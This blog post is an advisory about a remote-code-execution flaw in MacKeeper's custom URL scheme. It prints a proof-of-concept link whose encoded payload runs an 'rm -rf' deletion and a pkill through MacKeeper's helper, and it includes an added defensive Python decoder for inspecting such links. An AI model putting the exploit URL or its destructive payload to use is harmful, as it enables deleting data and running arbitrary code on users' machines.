Serious MacKeeper vulnerability found
Published May 9th, 2015 at 7:21 AM EDT , modified May 9th, 2015 at 7:21 AM EDT
I have long advised against using MacKeeper for a variety of reasons (some of which can be found in Ongoing MacKeeper fraud). However, now there’s a new reason to avoid MacKeeper: it has been found to contain a serious vulnerability that can lead to remote code execution through the use of a malicious URL. In non-tech-speak, a hacker can create a link that will, if clicked, result in MacKeeper executing code embedded within the link! Such code could do things like wiping your hard drive clean, uploading data to a remote server, or downloading and installing malware.
This is a very serious issue, and now that a proof-of-concept has been published, users of MacKeeper are at high risk of attack. No malicious MacKeeper URLs have yet been spotted in the wild, but hackers have the blueprints now, so it’s undoubtedly just a matter of time.
The attack is quite simple, unfortunately. Take a look at the proof-of-concept (PoC) URL released by Braden Thomas:
com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/ BAtzdHJlYW10eXBlZIHoA4QBQISEhAhOU1N0cmluZwGEhAhOU09iamVjdACFhAErBk5TVGFz a4aShISEDE5TRGljdGlvbmFyeQCUhAFpA5KEk5UJQVJHVU1FTlRThpKEhIQHTlNBcnJheQCU lwKShJOVAi1jhpKEk5U4cm0gLXJmIC9BcHBsaWNhdGlvbnMvTWFjS2VlcGVyLmFwcDtwa2ls bCAtOSAtYSBNYWNLZWVwZXKGhpKEk5UGUFJPTVBUhpKEk5UzWW91ciBjb21wdXRlciBoYXMg bWFsd2FyZSB0aGF0IG5lZWRzIHRvIGJlIHJlbW92ZWQuhpKEk5ULTEFVTkNIX1BBVEiGkoST lQcvYmluL3NohoY=
This PoC will execute the following command:
rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper
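To show how a defender can read what such a link would do without clicking it, here is an added Python decoder (not part of the original post and not MacKeeper's code): it parses the PoC URL above, base64-decodes the NSArchiver payload it carries, pulls out the archived strings and rebuilds the helper-task command line. It assumes the whitespace in the printed URL is line wrapping, and its string-framing rule (bytes 0x93 0x95, a one-byte length, then the string) is an observation about this particular archive, not a general typedstream parser.

```python
# Added example (not MacKeeper's code): read what a com-zeobit-command: link
# would make the helper run, without clicking it. Not a general typedstream parser.
import base64
import re
import shlex

SCHEME = "com-zeobit-command:"
HELPER_SELECTOR = "performActionWithHelperTask:arguments:"
KEYS = {"ARGUMENTS", "PROMPT", "LAUNCH_PATH"}

# The PoC URL as printed above; its whitespace is assumed to be line wrapping.
POC_URL = """com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/
BAtzdHJlYW10eXBlZIHoA4QBQISEhAhOU1N0cmluZwGEhAhOU09iamVjdACFhAErBk5TVGFz
a4aShISEDE5TRGljdGlvbmFyeQCUhAFpA5KEk5UJQVJHVU1FTlRThpKEhIQHTlNBcnJheQCU
lwKShJOVAi1jhpKEk5U4cm0gLXJmIC9BcHBsaWNhdGlvbnMvTWFjS2VlcGVyLmFwcDtwa2ls
bCAtOSAtYSBNYWNLZWVwZXKGhpKEk5UGUFJPTVBUhpKEk5UzWW91ciBjb21wdXRlciBoYXMg
bWFsd2FyZSB0aGF0IG5lZWRzIHRvIGJlIHJlbW92ZWQuhpKEk5ULTEFVTkNIX1BBVEiGkoST
lQcvYmluL3NohoY="""

def parse_url(url):
    """Return (selector, decoded payload), or None if the URL is not this scheme."""
    url = re.sub(r"\s+", "", url)
    if not url.startswith(SCHEME):
        return None
    # Path shape: /i/ZBAppController/<selector>/<base64 NSArchiver payload>
    parts = url[len(SCHEME):].lstrip("/").split("/", 3)
    if len(parts) != 4:
        return None
    return parts[2], base64.b64decode(parts[3], validate=True)

def archived_strings(blob):
    """Yield each NSString in this archive: 0x93 0x95 marker, one-byte length, bytes."""
    for m in re.finditer(rb"\x93\x95(.)", blob, re.DOTALL):
        n = m.group(1)[0]
        yield blob[m.end():m.end() + n].decode("ascii", "replace")

def helper_task_fields(blob):
    """Group archived strings under the dictionary key that precedes them."""
    fields, current = {}, None
    for s in archived_strings(blob):
        if s in KEYS:
            current = fields.setdefault(s, [])
        elif current is not None:
            current.append(s)
    return fields

def triage(url):
    """Return the command line the link asks the helper to run, or None."""
    parsed = parse_url(url)
    if parsed is None or parsed[0] != HELPER_SELECTOR:
        return None
    f = helper_task_fields(parsed[1])
    return shlex.join(f.get("LAUNCH_PATH", []) + f.get("ARGUMENTS", []))
```

Running `triage(POC_URL)` yields the `/bin/sh -c` invocation of the command shown above, and the PROMPT field shows the fake "malware" message the helper would display; a URL in any other scheme, or one that does not target the helper-task selector, returns None.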
One may wonder who in their right mind would click on a link that looks like that. However, in Mr. Thomas’ tweet containing the PoC, this URL was hidden behind a shortened tinyurl.com URL. Such link shortening can easily be used to disguise a maliciously crafted link, and has proven to be an effective method for tricking people into clicking on links they otherwise would not.
Those who have MacKeeper installed have a new, and very serious, reason to remove the software as soon as possible! To do so, follow the instructions on Phil Stokes’ page on removing MacKeeper, or use his DetectX app to find and remove all components of MacKeeper automatically.